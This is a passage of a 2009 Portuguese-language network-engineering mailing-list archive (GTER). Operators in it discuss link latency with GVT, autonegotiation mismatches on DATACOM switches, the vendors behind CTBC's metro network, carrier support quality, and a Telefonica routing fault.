nossa porta no Switch deles, resolvendo > >> > nosso problema. > >> > > >> > OBS: Alegaram que a vlan estava com uma > >> > configura??o errada, ocasionado tais problemas. > >> > > >> > > >> > > >> > >> > >> > >> Abra?os, > >> > >> > >> > Obrigado! > >> > >> -- > >> > >> gter list > >> > https://eng.registro.br/mailman/listinfo/gter > >> > >> > >> > > > >> > -- > >> > > gter list https://eng.registro.br/mailman/listinfo/gter > >> > > > >> > > >> > > >> > -- > >> > > >> > > >> > -- > >> > gter list https://eng.registro.br/mailman/listinfo/gter > >> > > >> > >> > >> > >> -- > >> Abra?os, > >> > >> Patrich Pizzolo > >> IT Coordinator > >> +55-48-9944-9090 > >> +55-47-8407-7768 > >> pizzolo at gmail.com > >> Skype: pizzolo_br > >> MSN: patrich_pizzolo at hotmail.com > >> SL: Xpiz Beam > >> Taikodom: Deathwing_br > >> -- > >> gter list https://eng.registro.br/mailman/listinfo/gter > >> > > > > > > > > -- > > Andr? Costa > > Chief Executive Officer > > Ib?ria Brasil Telecomunica??es > > (71) 2223-9026 / 7811-5816 > > NEXTEL 55*91*9228 > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > -- > gter list https://eng.registro.br/mailman/listinfo/gter _________________________________________________________________ Show them the way! Add maps and directions to your party invites. http://www.microsoft.com/windows/windowslive/products/events.aspx From rubensk at gmail.com Thu Jun 4 23:26:32 2009 From: rubensk at gmail.com (Rubens Kuhl) Date: Thu, 4 Jun 2009 23:26:32 -0300 Subject: [GTER] Problemas GVT - o que fazer? In-Reply-To: References: <37899f4a0906030645s771e75a3l9e68ae614674c9bc@mail.gmail.com> <86b352050906031135o5d64187lb067b42d88645558@mail.gmail.com> <4414.192.168.1.7.1244054641.squirrel@webmail.viasite.com.br> <37899f4a0906031244x7d8dd92hc980a7d997cf6166@mail.gmail.com> <6bb5f5b10906041002w767b9542ua778293e8d9751d2@mail.gmail.com> Message-ID: <6bb5f5b10906041926pf640d15p608eb41216bd2092@mail.gmail.com> Eu me referi ? rede da CTBC que antes era Iqara Telecom, na regi?o metropolitana de SP. Voc? se refere ? rede da CTBC no Tri?ngulo Mineiro ? Porque realmente me falam que a rede no tri?ngulo ? toda Cisco. Rubens 2009/6/4 Ricardo Castanheira : > > Rubens, a rede da CTBC "Metro" ? 100% cisco. > O produtos da DataCom n?o est?o nem homologados. > Fora da rede metro pode haver sim. > > Abra?os > Ricardo Castanheira > >> Date: Thu, 4 Jun 2009 14:02:30 -0300 >> From: rubensk at gmail.com >> To: gter at eng.registro.br >> Subject: Re: [GTER] Problemas GVT - o que fazer? >> >> Infelizmente a rede metro da CTBC ? quase toda DATACOM, com alguns >> Cisco apenas quando necess?rios features tipo QinQ. Espero que seu >> e-mail chegue a algu?m de l?... >> >> >> Rubens >> >> >> 2009/6/3 Andr? Costa : >> > Caros colegas, >> > >> > Se for envolvido equipamento DATACOM realmente existe at? uma nota no site >> > deles falando sobre o assunto, as teles tem seguido o conselho de for?ar a >> > porta. >> > >> > Aqui na empresa resolvemos n?o utilizar mais DATACOM por esses e outros >> > problemas. S?o equipamentos muito problem?tico e suporte ? p?ssimo. >> > >> > >> > >> > 2009/6/3 Patrich Pizzolo >> > >> >> Obrigado pelas respostas, >> >> n?o se trata de lenda n?o!!! Descobri h? duras penas h? cerca de 15 dias >> >> atr?s este problema aqui, s? ficou ok quando forcei minha eth para 100Mbps >> >> Full-Duplex! >> >> Por?m o problema est? bem isolado, j? coloquei diversos notebooks e >> >> desktops >> >> e o problema sempre persiste sim! >> >> >> >> Creio que seja exatamente o caso de porta do Switch Datacom no qual o >> >> Juliano falou aqui! Mas eu j? falei com mil e um t?cnicos, gerente de conta >> >> e ouvidoria para verificarem isto e eles continuam afirmando >> >> categoricamente >> >> que n?o h? problema! >> >> >> >> Alguma id?ia? >> >> >> >> >> >> 2009/6/3 Juliano S. Nascimento >> >> >> >> > >> >> > >> >> > >> >> > > Voce checou poss?veis port-mismatch ? >> >> > Auto-negocia??o X portas for?adas ? >> >> > > >> >> > > Corre uma lenda por a? que as portas fastethernet devem ser >> >> > for?adas a >> >> > > 100Mb/s. Na verdade essa hist?ria >> >> > remonta h? anos quando existia um bug na >> >> > > >> >> > negocia??o de alguns equipamentos que faziam os mesmos >> >> > negociarem como >> >> > > half. >> >> > > Isso acabou e s? sobrou a >> >> > lenda. >> >> > > >> >> > > A regra ?: >> >> > > >> >> > > - >> >> > Auto-negocia??o com auto-negoci???o >> >> > > - Porta for?ada (sem autoneg) com Porta for?ada >> >> > > >> >> > > Qualquer outra combina??o trar? >> >> > problemas. >> >> > > >> >> > > Voc? colocou 1 notebook ligado >> >> > direto no link para eliminar problemas com >> >> > > sua rede, seu >> >> > firewall, etc? >> >> > > >> >> > > Grato. >> >> > > >> >> > > 2009/6/3 >> >> > Patrich Pizzolo >> >> > > >> >> > >> Bom dia >> >> > a todos, >> >> > >> gostaria de ter uma opini?o dos ilustres >> >> > colegas que integram esta >> >> > >> lista. >> >> > >> Tenho um link >> >> > de 10Mbps por fibra e ap?s um problema em um switch da GVT >> >> > >> meu >> >> > >> tempo de resposta entre a Eth do meu router e >> >> > a do router da gvt que s?o >> >> > >> interligados por uma fibra >> >> > est? chegando a picos de at? 946ms com uma >> >> > >> >> >> > m?dia >> >> > >> em torno de 10ms, isso com o link isolado e >> >> > j? testei com diversos >> >> > >> outros >> >> > >> routers e >> >> > sempre obtenho os mesmos tempos de resposta, definitivamente >> >> > >> >> >> > n?o >> >> > >> tenho problema nesta ponta. Possuo um outro link >> >> > com a BrT e est? tudo >> >> > >> normal com tempo de resposta >> >> > excelente sem nenhuma varia??o deste tipo. >> >> > >> >> >> > Estou nesta situa??o h? 7 dias e o pessoal da >> >> > operadora insiste em dizer >> >> > >> que >> >> > >> est? >> >> > tudo normal. J? nem aguento mais falar com eles... >> >> > >> >> >> > >> Algu?m tem alguma id?ia? >> >> > >> >> >> > >> No momento estou pensando em acionar e cancelar o link. >> >> > >> >> > Caro, >> >> > >> >> > Tivemos o mesmo problema algum tempo atras com a >> >> > GVT. Depois de muitos testes e alegarem que nossos servidores estavam mal >> >> > configurados e n?o terem resultados positivos com esta >> >> > afirma??o, trocaram nossa porta no Switch deles, resolvendo >> >> > nosso problema. >> >> > >> >> > OBS: Alegaram que a vlan estava com uma >> >> > configura??o errada, ocasionado tais problemas. >> >> > >> >> > >> >> > >> >> > >> >> >> > >> Abra?os, >> >> > >> >> >> > Obrigado! >> >> > >> -- >> >> > >> gter list >> >> > https://eng.registro.br/mailman/listinfo/gter >> >> > >> >> >> > > >> >> > -- >> >> > > gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> >> > > >> >> > >> >> > >> >> > -- >> >> > >> >> > >> >> > -- >> >> > gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> >> > >> >> >> >> >> >> >> >> -- >> >> Abra?os, >> >> >> >> Patrich Pizzolo >> >> IT Coordinator >> >> +55-48-9944-9090 >> >> +55-47-8407-7768 >> >> pizzolo at gmail.com >> >> Skype: pizzolo_br >> >> MSN: patrich_pizzolo at hotmail.com >> >> SL: Xpiz Beam >> >> Taikodom: Deathwing_br >> >> ?-- >> >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> >> >> > >> > >> > >> > -- >> > Andr? Costa >> > Chief Executive Officer >> > Ib?ria Brasil Telecomunica??es >> > (71) 2223-9026 / 7811-5816 >> > NEXTEL 55*91*9228 >> > -- >> > gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter > > _________________________________________________________________ > Show them the way! Add maps and directions to your party invites. > http://www.microsoft.com/windows/windowslive/products/events.aspx > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From alexandre at onda.psi.br Thu Jun 4 23:31:55 2009 From: alexandre at onda.psi.br (Alexandre J. Correa - Onda Internet) Date: Thu, 04 Jun 2009 23:31:55 -0300 Subject: [GTER] Problemas GVT - o que fazer? In-Reply-To: <6bb5f5b10906041926pf640d15p608eb41216bd2092@mail.gmail.com> References: <37899f4a0906030645s771e75a3l9e68ae614674c9bc@mail.gmail.com> <86b352050906031135o5d64187lb067b42d88645558@mail.gmail.com> <4414.192.168.1.7.1244054641.squirrel@webmail.viasite.com.br> <37899f4a0906031244x7d8dd92hc980a7d997cf6166@mail.gmail.com> <6bb5f5b10906041002w767b9542ua778293e8d9751d2@mail.gmail.com> <6bb5f5b10906041926pf640d15p608eb41216bd2092@mail.gmail.com> Message-ID: <4A28839B.205@onda.psi.br> Oppss rede metro da CTBC ? toda JUNIPER !! sei que migraram tudo para juniper.. se tiver cisco, eh muito pouco... Rubens Kuhl wrote: > Eu me referi ? rede da CTBC que antes era Iqara Telecom, na regi?o > metropolitana de SP. > Voc? se refere ? rede da CTBC no Tri?ngulo Mineiro ? Porque realmente > me falam que a rede no tri?ngulo ? toda Cisco. > > > Rubens > > > 2009/6/4 Ricardo Castanheira : > >> Rubens, a rede da CTBC "Metro" ? 100% cisco. >> O produtos da DataCom n?o est?o nem homologados. >> Fora da rede metro pode haver sim. >> >> Abra?os >> Ricardo Castanheira >> >> >>> Date: Thu, 4 Jun 2009 14:02:30 -0300 >>> From: rubensk at gmail.com >>> To: gter at eng.registro.br >>> Subject: Re: [GTER] Problemas GVT - o que fazer? >>> >>> Infelizmente a rede metro da CTBC ? quase toda DATACOM, com alguns >>> Cisco apenas quando necess?rios features tipo QinQ. Espero que seu >>> e-mail chegue a algu?m de l?... >>> >>> >>> Rubens >>> >>> >>> 2009/6/3 Andr? Costa : >>> >>>> Caros colegas, >>>> >>>> Se for envolvido equipamento DATACOM realmente existe at? uma nota no site >>>> deles falando sobre o assunto, as teles tem seguido o conselho de for?ar a >>>> porta. >>>> >>>> Aqui na empresa resolvemos n?o utilizar mais DATACOM por esses e outros >>>> problemas. S?o equipamentos muito problem?tico e suporte ? p?ssimo. >>>> >>>> >>>> >>>> 2009/6/3 Patrich Pizzolo >>>> >>>> >>>>> Obrigado pelas respostas, >>>>> n?o se trata de lenda n?o!!! Descobri h? duras penas h? cerca de 15 dias >>>>> atr?s este problema aqui, s? ficou ok quando forcei minha eth para 100Mbps >>>>> Full-Duplex! >>>>> Por?m o problema est? bem isolado, j? coloquei diversos notebooks e >>>>> desktops >>>>> e o problema sempre persiste sim! >>>>> >>>>> Creio que seja exatamente o caso de porta do Switch Datacom no qual o >>>>> Juliano falou aqui! Mas eu j? falei com mil e um t?cnicos, gerente de conta >>>>> e ouvidoria para verificarem isto e eles continuam afirmando >>>>> categoricamente >>>>> que n?o h? problema! >>>>> >>>>> Alguma id?ia? >>>>> >>>>> >>>>> 2009/6/3 Juliano S. Nascimento >>>>> >>>>> >>>>>> >>>>>> >>>>>>> Voce checou poss?veis port-mismatch ? >>>>>>> >>>>>> Auto-negocia??o X portas for?adas ? >>>>>> >>>>>>> Corre uma lenda por a? que as portas fastethernet devem ser >>>>>>> >>>>>> for?adas a >>>>>> >>>>>>> 100Mb/s. Na verdade essa hist?ria >>>>>>> >>>>>> remonta h? anos quando existia um bug na >>>>>> >>>>>> negocia??o de alguns equipamentos que faziam os mesmos >>>>>> negociarem como >>>>>> >>>>>>> half. >>>>>>> Isso acabou e s? sobrou a >>>>>>> >>>>>> lenda. >>>>>> >>>>>>> A regra ?: >>>>>>> >>>>>>> - >>>>>>> >>>>>> Auto-negocia??o com auto-negoci???o >>>>>> >>>>>>> - Porta for?ada (sem autoneg) com Porta for?ada >>>>>>> >>>>>>> Qualquer outra combina??o trar? >>>>>>> >>>>>> problemas. >>>>>> >>>>>>> Voc? colocou 1 notebook ligado >>>>>>> >>>>>> direto no link para eliminar problemas com >>>>>> >>>>>>> sua rede, seu >>>>>>> >>>>>> firewall, etc? >>>>>> >>>>>>> Grato. >>>>>>> >>>>>>> 2009/6/3 >>>>>>> >>>>>> Patrich Pizzolo >>>>>> >>>>>>>> Bom dia >>>>>>>> >>>>>> a todos, >>>>>> >>>>>>>> gostaria de ter uma opini?o dos ilustres >>>>>>>> >>>>>> colegas que integram esta >>>>>> >>>>>>>> lista. >>>>>>>> Tenho um link >>>>>>>> >>>>>> de 10Mbps por fibra e ap?s um problema em um switch da GVT >>>>>> >>>>>>>> meu >>>>>>>> tempo de resposta entre a Eth do meu router e >>>>>>>> >>>>>> a do router da gvt que s?o >>>>>> >>>>>>>> interligados por uma fibra >>>>>>>> >>>>>> est? chegando a picos de at? 946ms com uma >>>>>> >>>>>> m?dia >>>>>> >>>>>>>> em torno de 10ms, isso com o link isolado e >>>>>>>> >>>>>> j? testei com diversos >>>>>> >>>>>>>> outros >>>>>>>> routers e >>>>>>>> >>>>>> sempre obtenho os mesmos tempos de resposta, definitivamente >>>>>> >>>>>> n?o >>>>>> >>>>>>>> tenho problema nesta ponta. Possuo um outro link >>>>>>>> >>>>>> com a BrT e est? tudo >>>>>> >>>>>>>> normal com tempo de resposta >>>>>>>> >>>>>> excelente sem nenhuma varia??o deste tipo. >>>>>> >>>>>> Estou nesta situa??o h? 7 dias e o pessoal da >>>>>> operadora insiste em dizer >>>>>> >>>>>>>> que >>>>>>>> est? >>>>>>>> >>>>>> tudo normal. J? nem aguento mais falar com eles... >>>>>> >>>>>>>> Algu?m tem alguma id?ia? >>>>>>>> >>>>>>>> No momento estou pensando em acionar e cancelar o link. >>>>>>>> >>>>>> Caro, >>>>>> >>>>>> Tivemos o mesmo problema algum tempo atras com a >>>>>> GVT. Depois de muitos testes e alegarem que nossos servidores estavam mal >>>>>> configurados e n?o terem resultados positivos com esta >>>>>> afirma??o, trocaram nossa porta no Switch deles, resolvendo >>>>>> nosso problema. >>>>>> >>>>>> OBS: Alegaram que a vlan estava com uma >>>>>> configura??o errada, ocasionado tais problemas. >>>>>> >>>>>> >>>>>> >>>>>> >>>>>>>> Abra?os, >>>>>>>> >>>>>>>> >>>>>> Obrigado! >>>>>> >>>>>>>> -- >>>>>>>> gter list >>>>>>>> >>>>>> https://eng.registro.br/mailman/listinfo/gter >>>>>> >>>>>> -- >>>>>> >>>>>>> gter list https://eng.registro.br/mailman/listinfo/gter >>>>>>> >>>>>>> >>>>>> -- >>>>>> >>>>>> >>>>>> -- >>>>>> gter list https://eng.registro.br/mailman/listinfo/gter >>>>>> >>>>>> >>>>> >>>>> -- >>>>> Abra?os, >>>>> >>>>> Patrich Pizzolo >>>>> IT Coordinator >>>>> +55-48-9944-9090 >>>>> +55-47-8407-7768 >>>>> pizzolo at gmail.com >>>>> Skype: pizzolo_br >>>>> MSN: patrich_pizzolo at hotmail.com >>>>> SL: Xpiz Beam >>>>> Taikodom: Deathwing_br >>>>> -- >>>>> gter list https://eng.registro.br/mailman/listinfo/gter >>>>> >>>>> >>>> >>>> -- >>>> Andr? Costa >>>> Chief Executive Officer >>>> Ib?ria Brasil Telecomunica??es >>>> (71) 2223-9026 / 7811-5816 >>>> NEXTEL 55*91*9228 >>>> -- >>>> gter list https://eng.registro.br/mailman/listinfo/gter >>>> >>> -- >>> gter list https://eng.registro.br/mailman/listinfo/gter >>> >> _________________________________________________________________ >> Show them the way! Add maps and directions to your party invites. >> http://www.microsoft.com/windows/windowslive/products/events.aspx >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > From rubensk at gmail.com Fri Jun 5 00:33:03 2009 From: rubensk at gmail.com (Rubens Kuhl) Date: Fri, 5 Jun 2009 00:33:03 -0300 Subject: [GTER] RES: Ainda problemas com a telefonica In-Reply-To: References: <4A280083.9070207@cyberweb.com.br> Message-ID: <6bb5f5b10906042033t17caf5f5nd04cf2a5ab6e2974@mail.gmail.com> Epafras, Todos os circuitos da CTBC que temos, dos quais os problemas que comentei afetam todos, s?o metro e/ou clear-channel... n?o temos servi?os roteados para opinar sobre o servi?o. A n?o ser que os servi?os sejam AToM ou EoMPLS e n?o estejamos sabendo, mas acho que n?o s?o n?o... Rubens 2009/6/4 : > Grandes Mestres (Hebert, Rubens, Juliano and all), > > ? sempre bom para n?s ouvirmos depoimentos legais como o do Hebert e > trabalhamos sempre para que tenhamos mais e mais fatos como este aqui na > CTBC. Tamb?m pessoalmente n?o tenho a inten??o de resolver todos os > problemas mas, se algum de voc?s tiver alguma complica??o no > relacionamento conosco, principalmente com rela??o a roteamento (?rea que > me compete), fiquem a vontade em me acionar diretamente... no demais, > estamos trabalhando para melhorar sempre... ? at? IPv6 aqui j? funciona > n?o eh Juliano ??? :-) > > Valeu.. Abs.. > > Epafras Schaden > Engenharia de Redes IP > CTBC/Algar Telecom > > > > > > > Re: [GTER] RES: Ainda problemas com a telefonica > > Juliano Primavesi - Cyberweb Networks > para: > Grupo de Trabalho de Engenharia e Operacao de Redes > 04/06/2009 14:09 > > > Enviado por: > gter-bounces at eng.registro.br > Responda a Grupo de Trabalho de Engenharia e Operacao de Redes > > > > > > > > Concordo... certa vez, ap?s esperar por 4 horas por uma "ajuda" da CTBC, > acabei eu mesmo por resolver um certo problema de publica??o de rotas... > > Juliano > > Rubens Kuhl escreveu: >> Sua experi?ncia com a Algar/CTBC ?, felizmente para voc?, muito melhor >> do que a nossa. >> >> >> Rubens >> >> >> >>> Ontem tive problemas com um link Algar (CTBC), o atendimento foi super > r?pido, >>> o suporte n?vel 1 por incr?vel que possa parecer SABIA o que eu estava >>> falando, anotaram todos os dados pertinentes e em poucos minutos algu?m > n?vel >>> 2 me ligou informando o que estava acontecendo, e mais, ap?s resolverem > o >>> problema ligaram novamente perguntando como estava o link! >>> >>> Quem est? acostumado com a Telefonica (com aquele 0800 que quando > consegue >>> falar com algu?m nunca sabem o que falam --e o que falamos tamb?m-- e > nunca >>> resolvem nada) se espanta com um atendimento como esse (que relatei > sobre a >>> Algar). >>> >>> -- >>> Herbert >>> -- >>> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >>> >>> >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From rubensk at gmail.com Fri Jun 5 02:43:21 2009 From: rubensk at gmail.com (Rubens Kuhl) Date: Fri, 5 Jun 2009 02:43:21 -0300 Subject: [GTER] Problemas no Acesso ao site ipv6.br In-Reply-To: <4A26D01F.5030301@conectcor.com.br> References: <4A26D01F.5030301@conectcor.com.br> Message-ID: <6bb5f5b10906042243o329bde68h5379e6db7704435a@mail.gmail.com> Dogbert Internet help-desk: J? tentou acessar via IPv6 ? :-) Rubens 2009/6/3 Welisson : > Boa tarde a todos > > Gostaria de saber se est? ocorrendo alguma atualiza??o no site www.ipv6.br, > pois o mesmo encontra-se com mensagem do apache, como quem acabou de > instalar. > > ATT. > > -- > Welisson > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From antoniocarlospina at gmail.com Fri Jun 5 10:54:55 2009 From: antoniocarlospina at gmail.com (Antonio Carlos Pina) Date: Fri, 5 Jun 2009 10:54:55 -0300 Subject: [GTER] RES: Ainda problemas com a telefonica In-Reply-To: <6bb5f5b10906042033t17caf5f5nd04cf2a5ab6e2974@mail.gmail.com> References: <4A280083.9070207@cyberweb.com.br> <6bb5f5b10906042033t17caf5f5nd04cf2a5ab6e2974@mail.gmail.com> Message-ID: <86b352050906050654u25f4df46p6d0b936add97d86e@mail.gmail.com> Bom, o Epafras sempre nos atendeu bem. A? n?o vale ;-) Abs 2009/6/5 Rubens Kuhl > Epafras, > > Todos os circuitos da CTBC que temos, dos quais os problemas que > comentei afetam todos, s?o metro e/ou clear-channel... n?o temos > servi?os roteados para opinar sobre o servi?o. A n?o ser que os > servi?os sejam AToM ou EoMPLS e n?o estejamos sabendo, mas acho que > n?o s?o n?o... > > > Rubens > > > > > 2009/6/4 : > > Grandes Mestres (Hebert, Rubens, Juliano and all), > > > > ? sempre bom para n?s ouvirmos depoimentos legais como o do Hebert e > > trabalhamos sempre para que tenhamos mais e mais fatos como este aqui na > > CTBC. Tamb?m pessoalmente n?o tenho a inten??o de resolver todos os > > problemas mas, se algum de voc?s tiver alguma complica??o no > > relacionamento conosco, principalmente com rela??o a roteamento (?rea que > > me compete), fiquem a vontade em me acionar diretamente... no demais, > > estamos trabalhando para melhorar sempre... at? IPv6 aqui j? funciona > > n?o eh Juliano ??? :-) > > > > Valeu.. Abs.. > > > > Epafras Schaden > > Engenharia de Redes IP > > CTBC/Algar Telecom > > > > > > > > > > > > > > Re: [GTER] RES: Ainda problemas com a telefonica > > > > Juliano Primavesi - Cyberweb Networks > > para: > > Grupo de Trabalho de Engenharia e Operacao de Redes > > 04/06/2009 14:09 > > > > > > Enviado por: > > gter-bounces at eng.registro.br > > Responda a Grupo de Trabalho de Engenharia e Operacao de Redes > > > > > > > > > > > > > > > > Concordo... certa vez, ap?s esperar por 4 horas por uma "ajuda" da CTBC, > > acabei eu mesmo por resolver um certo problema de publica??o de rotas... > > > > Juliano > > > > Rubens Kuhl escreveu: > >> Sua experi?ncia com a Algar/CTBC ?, felizmente para voc?, muito melhor > >> do que a nossa. > >> > >> > >> Rubens > >> > >> > >> > >>> Ontem tive problemas com um link Algar (CTBC), o atendimento foi super > > r?pido, > >>> o suporte n?vel 1 por incr?vel que possa parecer SABIA o que eu estava > >>> falando, anotaram todos os dados pertinentes e em poucos minutos algu?m > > n?vel > >>> 2 me ligou informando o que estava acontecendo, e mais, ap?s resolverem > > o > >>> problema ligaram novamente perguntando como estava o link! > >>> > >>> Quem est? acostumado com a Telefonica (com aquele 0800 que quando > > consegue > >>> falar com algu?m nunca sabem o que falam --e o que falamos tamb?m-- e > > nunca > >>> resolvem nada) se espanta com um atendimento como esse (que relatei > > sobre a > >>> Algar). > >>> > >>> -- > >>> Herbert > >>> -- > >>> gter list https://eng.registro.br/mailman/listinfo/gter > >>> > >>> > >> -- > >> gter list https://eng.registro.br/mailman/listinfo/gter > >> > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From juliano at cyberweb.com.br Fri Jun 5 11:17:09 2009 From: juliano at cyberweb.com.br (Juliano Primavesi - Cyberweb Networks) Date: Fri, 05 Jun 2009 11:17:09 -0300 Subject: [GTER] RES: Ainda problemas com a telefonica In-Reply-To: <86b352050906050654u25f4df46p6d0b936add97d86e@mail.gmail.com> References: <4A280083.9070207@cyberweb.com.br> <6bb5f5b10906042033t17caf5f5nd04cf2a5ab6e2974@mail.gmail.com> <86b352050906050654u25f4df46p6d0b936add97d86e@mail.gmail.com> Message-ID: <4A2928E5.6060607@cyberweb.com.br> Concordo... do Epafras nao posso reclamar. No dia que precisei da CTBC, ele nao estava por l? :-) Juliano Antonio Carlos Pina escreveu: > Bom, o Epafras sempre nos atendeu bem. A? n?o vale ;-) > > Abs > > 2009/6/5 Rubens Kuhl > > >> Epafras, >> >> Todos os circuitos da CTBC que temos, dos quais os problemas que >> comentei afetam todos, s?o metro e/ou clear-channel... n?o temos >> servi?os roteados para opinar sobre o servi?o. A n?o ser que os >> servi?os sejam AToM ou EoMPLS e n?o estejamos sabendo, mas acho que >> n?o s?o n?o... >> >> >> Rubens >> >> >> >> >> 2009/6/4 : >> >>> Grandes Mestres (Hebert, Rubens, Juliano and all), >>> >>> ? sempre bom para n?s ouvirmos depoimentos legais como o do Hebert e >>> trabalhamos sempre para que tenhamos mais e mais fatos como este aqui na >>> CTBC. Tamb?m pessoalmente n?o tenho a inten??o de resolver todos os >>> problemas mas, se algum de voc?s tiver alguma complica??o no >>> relacionamento conosco, principalmente com rela??o a roteamento (?rea que >>> me compete), fiquem a vontade em me acionar diretamente... no demais, >>> estamos trabalhando para melhorar sempre... at? IPv6 aqui j? funciona >>> n?o eh Juliano ??? :-) >>> >>> Valeu.. Abs.. >>> >>> Epafras Schaden >>> Engenharia de Redes IP >>> CTBC/Algar Telecom >>> >>> >>> >>> >>> >>> >>> Re: [GTER] RES: Ainda problemas com a telefonica >>> >>> Juliano Primavesi - Cyberweb Networks >>> para: >>> Grupo de Trabalho de Engenharia e Operacao de Redes >>> 04/06/2009 14:09 >>> >>> >>> Enviado por: >>> gter-bounces at eng.registro.br >>> Responda a Grupo de Trabalho de Engenharia e Operacao de Redes >>> >>> >>> >>> >>> >>> >>> >>> Concordo... certa vez, ap?s esperar por 4 horas por uma "ajuda" da CTBC, >>> acabei eu mesmo por resolver um certo problema de publica??o de rotas... >>> >>> Juliano >>> >>> Rubens Kuhl escreveu: >>> >>>> Sua experi?ncia com a Algar/CTBC ?, felizmente para voc?, muito melhor >>>> do que a nossa. >>>> >>>> >>>> Rubens >>>> >>>> >>>> >>>> >>>>> Ontem tive problemas com um link Algar (CTBC), o atendimento foi super >>>>> >>> r?pido, >>> >>>>> o suporte n?vel 1 por incr?vel que possa parecer SABIA o que eu estava >>>>> falando, anotaram todos os dados pertinentes e em poucos minutos algu?m >>>>> >>> n?vel >>> >>>>> 2 me ligou informando o que estava acontecendo, e mais, ap?s resolverem >>>>> >>> o >>> >>>>> problema ligaram novamente perguntando como estava o link! >>>>> >>>>> Quem est? acostumado com a Telefonica (com aquele 0800 que quando >>>>> >>> consegue >>> >>>>> falar com algu?m nunca sabem o que falam --e o que falamos tamb?m-- e >>>>> >>> nunca >>> >>>>> resolvem nada) se espanta com um atendimento como esse (que relatei >>>>> >>> sobre a >>> >>>>> Algar). >>>>> >>>>> -- >>>>> Herbert >>>>> -- >>>>> gter list https://eng.registro.br/mailman/listinfo/gter >>>>> >>>>> >>>>> >>>> -- >>>> gter list https://eng.registro.br/mailman/listinfo/gter >>>> >>>> >>> -- >>> gter list https://eng.registro.br/mailman/listinfo/gter >>> >>> -- >>> gter list https://eng.registro.br/mailman/listinfo/gter >>> >>> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From raphaelbscosta at gmail.com Fri Jun 5 11:58:12 2009 From: raphaelbscosta at gmail.com (Raphael Costa) Date: Fri, 5 Jun 2009 11:58:12 -0300 Subject: [GTER] RES: Ainda problemas com a telefonica In-Reply-To: <86b352050906050654u25f4df46p6d0b936add97d86e@mail.gmail.com> References: <4A280083.9070207@cyberweb.com.br> <6bb5f5b10906042033t17caf5f5nd04cf2a5ab6e2974@mail.gmail.com> <86b352050906050654u25f4df46p6d0b936add97d86e@mail.gmail.com> Message-ID: Caros, Acabei de realizar novos testes e todas as transfer?ncias TCP entre EUA e Brasil funcionaram pela Telef?nica. A equipe de l? nos informou que era um problema em um dos routers da TIWS em Santos e que eles resolveram hoje, ainda estamos aguardando um relat?rio t?cnico. 2009/6/5 Antonio Carlos Pina > Bom, o Epafras sempre nos atendeu bem. A? n?o vale ;-) > > Abs > > 2009/6/5 Rubens Kuhl > > > Epafras, > > > > Todos os circuitos da CTBC que temos, dos quais os problemas que > > comentei afetam todos, s?o metro e/ou clear-channel... n?o temos > > servi?os roteados para opinar sobre o servi?o. A n?o ser que os > > servi?os sejam AToM ou EoMPLS e n?o estejamos sabendo, mas acho que > > n?o s?o n?o... > > > > > > Rubens > > > > > > > > > > 2009/6/4 : > > > Grandes Mestres (Hebert, Rubens, Juliano and all), > > > > > > ? sempre bom para n?s ouvirmos depoimentos legais como o do Hebert e > > > trabalhamos sempre para que tenhamos mais e mais fatos como este aqui > na > > > CTBC. Tamb?m pessoalmente n?o tenho a inten??o de resolver todos os > > > problemas mas, se algum de voc?s tiver alguma complica??o no > > > relacionamento conosco, principalmente com rela??o a roteamento (?rea > que > > > me compete), fiquem a vontade em me acionar diretamente... no demais, > > > estamos trabalhando para melhorar sempre... at? IPv6 aqui j? funciona > > > n?o eh Juliano ??? :-) > > > > > > Valeu.. Abs.. > > > > > > Epafras Schaden > > > Engenharia de Redes IP > > > CTBC/Algar Telecom > > > > > > > > > > > > > > > > > > > > > Re: [GTER] RES: Ainda problemas com a telefonica > > > > > > Juliano Primavesi - Cyberweb Networks > > > para: > > > Grupo de Trabalho de Engenharia e Operacao de Redes > > > 04/06/2009 14:09 > > > > > > > > > Enviado por: > > > gter-bounces at eng.registro.br > > > Responda a Grupo de Trabalho de Engenharia e Operacao de Redes > > > > > > > > > > > > > > > > > > > > > > > > Concordo... certa vez, ap?s esperar por 4 horas por uma "ajuda" da > CTBC, > > > acabei eu mesmo por resolver um certo problema de publica??o de > rotas... > > > > > > Juliano > > > > > > Rubens Kuhl escreveu: > > >> Sua experi?ncia com a Algar/CTBC ?, felizmente para voc?, muito melhor > > >> do que a nossa. > > >> > > >> > > >> Rubens > > >> > > >> > > >> > > >>> Ontem tive problemas com um link Algar (CTBC), o atendimento foi > super > > > r?pido, > > >>> o suporte n?vel 1 por incr?vel que possa parecer SABIA o que eu > estava > > >>> falando, anotaram todos os dados pertinentes e em poucos minutos > algu?m > > > n?vel > > >>> 2 me ligou informando o que estava acontecendo, e mais, ap?s > resolverem > > > o > > >>> problema ligaram novamente perguntando como estava o link! > > >>> > > >>> Quem est? acostumado com a Telefonica (com aquele 0800 que quando > > > consegue > > >>> falar com algu?m nunca sabem o que falam --e o que falamos tamb?m-- e > > > nunca > > >>> resolvem nada) se espanta com um atendimento como esse (que relatei > > > sobre a > > >>> Algar). > > >>> > > >>> -- > > >>> Herbert > > >>> -- > > >>> gter list https://eng.registro.br/mailman/listinfo/gter > > >>> > > >>> > > >> -- > > >> gter list https://eng.registro.br/mailman/listinfo/gter > > >> > > > > > > -- > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > > -- > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- Raphael Bittencourt S. 